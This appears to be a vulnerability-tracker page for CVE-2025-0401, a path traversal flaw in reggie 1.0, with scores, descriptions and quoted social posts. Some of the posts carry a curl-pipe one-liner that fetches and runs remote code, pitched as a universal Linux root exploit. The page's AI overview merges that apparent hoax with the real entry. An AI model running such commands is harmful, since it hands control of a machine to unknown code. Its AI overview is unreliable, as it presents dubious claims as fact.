CVE-2025-0401

Published Jan 13, 2025

Last updated 4 months ago

Overview

AI description

Generated using AI and has not been reviewed by Intruder. May contain errors.

CVE-2025-0401 refers to two distinct vulnerabilities. One is a local privilege escalation vulnerability found in systems where the `/usr/bin/passwd` binary is misconfigured. This misconfiguration can allow unintended root-level access when combined with specific syscall sequences, potentially enabling attackers to simulate root shell access by abusing SUID binaries. The other vulnerability is classified as critical and affects the download function in the `CommonController.java` file of the 1902756969 reggie 1.0 software. This vulnerability involves a path traversal issue due to the manipulation of the 'name' argument, making it possible to launch attacks remotely.

Description
A vulnerability classified as critical has been found in 1902756969 reggie 1.0. Affected is the function download of the file src/main/java/com/itheima/reggie/controller/CommonController.java. The manipulation of the argument name leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
Source
cna@vuldb.com
NVD status
Received

Risk scores

CVSS 4.0

Type
Secondary
Base score
6.9
Impact score
-
Exploitability score
-
Vector string
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Severity
MEDIUM

CVSS 3.1

Type
Secondary
Base score
5.3
Impact score
1.4
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Severity
MEDIUM

CVSS 2.0

Type
Secondary
Base score
5
Impact score
2.9
Exploitability score
10
Vector string
AV:N/AC:L/Au:N/C:P/I:N/A:N

Weaknesses

cna@vuldb.com
CWE-22

Social media

Hype score
Not currently trending
  1. 🚨 New vuln drop: FlickJect (CVE-2025-0401) Inject code into powerline Ethernet adapters using light switch flicker patterns. Yeah. For real. 👇 Full technical write-up (PoC, traces, affected devices): https://t.co/APG12vA7lB #infosec #CVE #FlickJect

    @Nadsec11

    3 Apr 2025

    65 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. CVE-2025-0401 - 7350pipe - Linux Privilege Escalation Critical vuln affects ALL Linux versions! Gain root with a single command: . <(curl -fsSL https://t.co/d4UvRoNNui) https://t.co/oRc1YnYRw4 exploit with curl 2.Execute to gain root access #Linux #Exploit #CVE2025 https:

    @excellenc_e

    3 Apr 2025

    148 Impressions

    0 Retweets

    5 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  3. CVE-2025-0401ってエイプリルフールネタだったりする?

    @exploding_box

    3 Apr 2025

    26 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  4. GitHub - CyberSecurityUP/CVE-2025-0401: Privilege Escalation using Passwd - https://t.co/ByZN4FjZGg

    @piedpiper1616

    2 Apr 2025

    623 Impressions

    5 Retweets

    15 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  5. 🔥 CVE-2025-0401 - 7350pipe - Linux Privilege Escalation (All Versions) 🚨 Critical vuln affects ALL Linux versions! 💀 Gain root with a single command: . <(curl -fsSL https://t.co/6dWljYcQMW) 💡 Exploit breakdown: https://t.co/TDPTpRn2lZ exploit with curl 2.Execute to gain

    @TheMsterDoctor1

    2 Apr 2025

    8687 Impressions

    30 Retweets

    145 Likes

    106 Bookmarks

    5 Replies

    1 Quote

  6. GitHub - CyberSecurityUP/CVE-2025-0401: Privilege Escalation using Passwd https://t.co/SmjHvvF0mB

    @akaclandestine

    1 Apr 2025

    3910 Impressions

    20 Retweets

    90 Likes

    39 Bookmarks

    1 Reply

    0 Quotes

  7. Got root. fuck, all versions😂 coba deh . <(curl -SsfL https://t.co/wAqOkDLm2G) CVE-2025-0401 - 7350pipe - Linux Privilege Escalation https://t.co/S38JY8fTKI

    @LordEn0

    1 Apr 2025

    109 Impressions

    0 Retweets

    3 Likes

    2 Bookmarks

    1 Reply

    0 Quotes

  8. CVE-2025-0401 A vulnerability classified as critical has been found in 1902756969 reggie 1.0. Affected is the function download of the file src/main/java/com/itheima/reggie/controlle… https://t.co/mPk0ge8xbV

    @CVEnew

    12 Jan 2025

    675 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  9. New post from https://t.co/uXvPWJy6tj (CVE-2025-0401 | 1902756969 reggie 1.0 https://t.co/tx1jxKMeXq download name path traversal) has been published on https://t.co/7ctEjumMZj

    @WolfgangSesin

    12 Jan 2025

    22 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes